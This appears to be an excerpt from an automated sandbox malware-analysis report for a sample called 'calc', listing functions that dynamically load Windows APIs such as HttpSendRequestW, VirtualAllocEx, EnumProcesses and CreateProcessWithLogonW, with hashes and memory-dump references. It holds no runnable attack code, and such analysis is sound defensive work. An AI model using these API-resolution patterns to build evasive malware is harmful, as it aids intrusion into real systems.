Opcode Fuzzy Hash: 4ead3b7de1eb813e2890999ff995c73bf3de4ffd0baf0b3798f1e810c2294c97
Instruction Fuzzy Hash: 38D0C970540306EFCB209FB1C98A71277E8AB00707F20886BB989E1293D7B8C484CA1C

Function 00430098 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FDB8,?,0042AEB5,00000000,00000000,00000000,00000000,00000000), ref: 004300A3
GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 004300B5

Strings

HttpSendRequestW, xrefs: 004300AF
Wininet.dll, xrefs: 0043009E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: HttpSendRequestW$Wininet.dll
API String ID: 2574300362-571859679
Opcode ID: 56287dbb5c8fa613192b2f9640bf059d33571e061af0d96863c42d5ccb391b72
Instruction ID: f9c0c41dff0c6647ec6965b73e0666f837cba77f00087c9ce6256905e321456e
Opcode Fuzzy Hash: 56287dbb5c8fa613192b2f9640bf059d33571e061af0d96863c42d5ccb391b72
Instruction Fuzzy Hash: FFD0C970641306EECB749F61D8497137AF8AB44702F20996BF886D1260E7B8D480CA1F

Function 004300BF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FDFA,00000000,0042B1CB,00000000,00000028,?,00000002,?,00000003), ref: 004300CA
GetProcAddress.KERNEL32(00000000,InternetQueryOptionW), ref: 004300DC

Strings

InternetQueryOptionW, xrefs: 004300D6
Wininet.dll, xrefs: 004300C5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetQueryOptionW$Wininet.dll
API String ID: 2574300362-1362718701
Opcode ID: 0d504de1963ce42602e00efced6689885ade31a502019b9bd417622be1b721a3
Instruction ID: c37a48820cd0ffcfbf34dd1ef459abadf152d0e03d59a3200862424fa437e460
Opcode Fuzzy Hash: 0d504de1963ce42602e00efced6689885ade31a502019b9bd417622be1b721a3
Instruction Fuzzy Hash: CED0C970641702EFCB208FA1D84D7177AF8AB48703F20DD6AB486E1260E778C440CE1E

Function 00416372 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0041461F,75730F00,00479E08), ref: 0041637D
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041638F

Strings

kernel32.dll, xrefs: 00416378
CreateToolhelp32Snapshot, xrefs: 00416389

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateToolhelp32Snapshot$kernel32.dll
API String ID: 2574300362-2184173117
Opcode ID: 62595157b22fda739014627afa9ea7e3df963d3aed48f7e5d35cffbc788012c6
Instruction ID: 9f7cde7f1173ff8d5ff4e5ff3ff1ee0d7b1cb5314f7db605f839c3c4faef6e20
Opcode Fuzzy Hash: 62595157b22fda739014627afa9ea7e3df963d3aed48f7e5d35cffbc788012c6
Instruction Fuzzy Hash: ADD0C970580706EFCB20AF61C8897137AE8AB50703F228C6AF8A9D2652D778D484CF1C

Function 004163C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00414641,75730F00,00479E08), ref: 004163CB
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004163DD

Strings

kernel32.dll, xrefs: 004163C6
Process32NextW, xrefs: 004163D7

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Process32NextW$kernel32.dll
API String ID: 2574300362-1444338893
Opcode ID: b7a060d01d0b2cbd5aeda42b9088a336d274536439e0dbfa02d83227cf22a235
Instruction ID: 8319ed1bb1247ee7603d4177eb116fae53f33f119acae12130f3e88490653f2d
Opcode Fuzzy Hash: b7a060d01d0b2cbd5aeda42b9088a336d274536439e0dbfa02d83227cf22a235
Instruction Fuzzy Hash: 02D0C770A40706EFC7305F61C88971376D46B01747F10886AF855D1251D778C484DB1C

Function 004163E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Psapi.dll,004147A2,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 004163F2
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00416404

Strings

Psapi.dll, xrefs: 004163ED
EnumProcesses, xrefs: 004163FE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumProcesses$Psapi.dll
API String ID: 2574300362-2142768860
Opcode ID: 618d42fc2998ab4b9def28153cc674556f41129a2cc7aa5b9427e406e46b19de
Instruction ID: b611058c7bdc95c68707464a329fe9fe04a65dd60b5ac42159b78de10f9528b9
Opcode Fuzzy Hash: 618d42fc2998ab4b9def28153cc674556f41129a2cc7aa5b9427e406e46b19de
Instruction Fuzzy Hash: 1ED0C7B0A40302DAC7205F61E84975A76D46F14703F11C86AF489D1153D778C485CA5C

Function 00416399 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00414630,75730F00,00479E08), ref: 004163A4
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004163B6

Strings

kernel32.dll, xrefs: 0041639F
Process32FirstW, xrefs: 004163B0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Process32FirstW$kernel32.dll
API String ID: 2574300362-3009187892
Opcode ID: 3ef915f0c527edf8a262af86bca1cad1980d7eba1d139d0164bfb6967e731860
Instruction ID: ac7a4e64c3133c5cf8734401ae9bcbe9a4321e908ed6f167add39891081ddbe8
Opcode Fuzzy Hash: 3ef915f0c527edf8a262af86bca1cad1980d7eba1d139d0164bfb6967e731860
Instruction Fuzzy Hash: 53D0C770540706EEC7205F65C84971376D86B04703F14986EFC55D1665D778C484CB1C

Function 0043B451 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0043B45C
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 0043B46E

Strings

Advapi32.dll, xrefs: 0043B457
CreateProcessWithLogonW, xrefs: 0043B468

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Advapi32.dll$CreateProcessWithLogonW
API String ID: 2574300362-755999451
Opcode ID: a1b84ca584a243ed6f42446eea0f28c42173d9ea2547da7be013d56738bda288
Instruction ID: 9c273b0ebcd64cb7b02c8d38e944e95f0e50cbb72423db979123efa01101c5c7
Opcode Fuzzy Hash: a1b84ca584a243ed6f42446eea0f28c42173d9ea2547da7be013d56738bda288
Instruction Fuzzy Hash: 57D0C770541702FEC7205F71C94A71276D4EB14702F50DC6BB5D5D1152D778C440C65D

Function 0041640E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Psapi.dll,004147B9,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00416419
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0041642B

Strings

Psapi.dll, xrefs: 00416414
EnumProcessModules, xrefs: 00416425

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumProcessModules$Psapi.dll
API String ID: 2574300362-751739868
Opcode ID: dca742bf0c2191a18ea4fe831902174497c2352ed576befcdaccc270da9a43b6
Instruction ID: 62cb81f13000a8f0cdb4eca7f8b3d29870d74f906e8d53b8d7c9d3e7b9002be5
Opcode Fuzzy Hash: dca742bf0c2191a18ea4fe831902174497c2352ed576befcdaccc270da9a43b6
Instruction Fuzzy Hash: 26D0C9B4942302EACB209F65C84975676E8AF20707F21C86AF889D1252D778D484CA1D

Function 00416435 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Psapi.dll,004147CB,00000000,75730F00,?,004145E2,0042018E,0042018E,00479E08,00479E08,00438624,02340F90,00479E08), ref: 00416440
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00416452

Strings

Psapi.dll, xrefs: 0041643B
GetModuleBaseNameW, xrefs: 0041644C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleBaseNameW$Psapi.dll
API String ID: 2574300362-3411073148
Opcode ID: e5c48572f6529f94537383b70a5a634ed20031b773c13a46fdf1be52ef221d82
Instruction ID: 1d527614041dbbbff0230691deebb7a116d124e4bb4cc2624b0546b3f0bf7ad4
Opcode Fuzzy Hash: e5c48572f6529f94537383b70a5a634ed20031b773c13a46fdf1be52ef221d82
Instruction Fuzzy Hash: 11D0C9B0940302EADB208F71C8697167BE8AF10703F21CC6AF88AD1251D778C584CE1D

Function 004124CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004124A7,?,004123DC,00000000,00000000,?,00001000,00000004,?,00000800,?,004029FA,00000800), ref: 004124D6
GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 004124E8

Strings

VirtualAllocEx, xrefs: 004124E2
kernel32.dll, xrefs: 004124D1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: VirtualAllocEx$kernel32.dll
API String ID: 2574300362-4123781057
Opcode ID: ac77adb85ffff738263622ca5f465b0932883e972d6436550eac2d7088bc0854
Instruction ID: 4ea207f8d300591824fdddc5101b73d117a3650087baea29c81dc6a0e988711c
Opcode Fuzzy Hash: ac77adb85ffff738263622ca5f465b0932883e972d6436550eac2d7088bc0854
Instruction Fuzzy Hash: D3D09270540703AACB209F65888971276A8AB41742F20C86AFC99D2262DBB8A4849A18

Function 004124F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004124BD,?,0041232F,?,?,00000000,00008000,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 004124FD
GetProcAddress.KERNEL32(00000000,VirtualFreeEx), ref: 0041250F

Strings

kernel32.dll, xrefs: 004124F8
VirtualFreeEx, xrefs: 00412509

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: VirtualFreeEx$kernel32.dll
API String ID: 2574300362-1049216354
Opcode ID: 04932301f2a78cefe13b07c69231992dba8d4483a09363a98b225d0f638a4b1c
Instruction ID: 6da001b12922d3df2c6c474ef46ecd45665f6b37187fb57d2993ef705c1d34b1
Opcode Fuzzy Hash: 04932301f2a78cefe13b07c69231992dba8d4483a09363a98b225d0f638a4b1c
Instruction Fuzzy Hash: A0D09270580702AADB309F61898971276A8AB10707F20886AA899E2252D7B8D4848A69

Function 004265CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0042476F), ref: 004265D5
GetProcAddress.KERNEL32(00000000,CreateHardLinkW), ref: 004265E7

Strings

CreateHardLinkW, xrefs: 004265E1
kernel32.dll, xrefs: 004265D0

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 2574300362-294928789
Opcode ID: aaf9ae32a098f21c7d34c0c2c7b5f3892074f661c523aa0547104ae0aadf32d8
Instruction ID: 9b13fefce5e6226982f924ed578a84b6c2732edf1a0fe20b4d9930c0dc0723ad
Opcode Fuzzy Hash: aaf9ae32a098f21c7d34c0c2c7b5f3892074f661c523aa0547104ae0aadf32d8
Instruction Fuzzy Hash: DFD0C770680703EEC7605F61E85971376D46F21703F14887EF455D1255EBB8D484C71D

Function 004265F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shell32.dll,00425246), ref: 004265FC
GetProcAddress.KERNEL32(00000000,SHEmptyRecycleBinW), ref: 0042660E

Strings

shell32.dll, xrefs: 004265F7
SHEmptyRecycleBinW, xrefs: 00426608

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHEmptyRecycleBinW$shell32.dll
API String ID: 2574300362-2648762502
Opcode ID: 5c5870679de98fa3a7f171b2adc597053b1240f36dedf80deb4db5d465042c9f
Instruction ID: 69feca8f4b5e5024963817c407de152b5a8bb493189561f5f2a67b8f08b708d8
Opcode Fuzzy Hash: 5c5870679de98fa3a7f171b2adc597053b1240f36dedf80deb4db5d465042c9f
Instruction Fuzzy Hash: 3AD0C9B0690302EBCB204F61E84D7237AE8AF14702F2088AEF4C5D2251E778CC40CA1D

Function 004265A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00424144,00000000,00000000), ref: 004265AE
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExW), ref: 004265C0

Strings

kernel32.dll, xrefs: 004265A9
GetDiskFreeSpaceExW, xrefs: 004265BA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 2574300362-1127948838
Opcode ID: ed3e403a5b733a6f55669303d0031102fcebbe94640a3d4ebf8c367d74782769
Instruction ID: 56f10fb3c108574ad7c62506ca6988ab3858942f7107cd8a287994bf9634255d
Opcode Fuzzy Hash: ed3e403a5b733a6f55669303d0031102fcebbe94640a3d4ebf8c367d74782769
Instruction Fuzzy Hash: F5D0C974640702EECB209F61E88971376E8AF10703F20886EF499D2259D778C884CB5D

Function 004418D4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,004413C5), ref: 004418DF
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004418F1

Strings

MonitorFromPoint, xrefs: 004418EB
user32.dll, xrefs: 004418DA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: MonitorFromPoint$user32.dll
API String ID: 2574300362-355800951
Opcode ID: 92819eae385e9d12839bf3ea17687f83216c2e149adf21791c5037f7f1619343
Instruction ID: d816af7e206fa6fb37d144fb02bdc24e08f93184c1c263658b26d2d31832ab4b
Opcode Fuzzy Hash: 92819eae385e9d12839bf3ea17687f83216c2e149adf21791c5037f7f1619343
Instruction Fuzzy Hash: 88D0C970540703EEDB20AF61C88971276E8BF20713F20887BB88BD2261DB7CC480DA1D

Function 004418FB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,004413D3), ref: 00441906
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 00441918

Strings

GetMonitorInfoW, xrefs: 00441912
user32.dll, xrefs: 00441901

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetMonitorInfoW$user32.dll
API String ID: 2574300362-3787768890
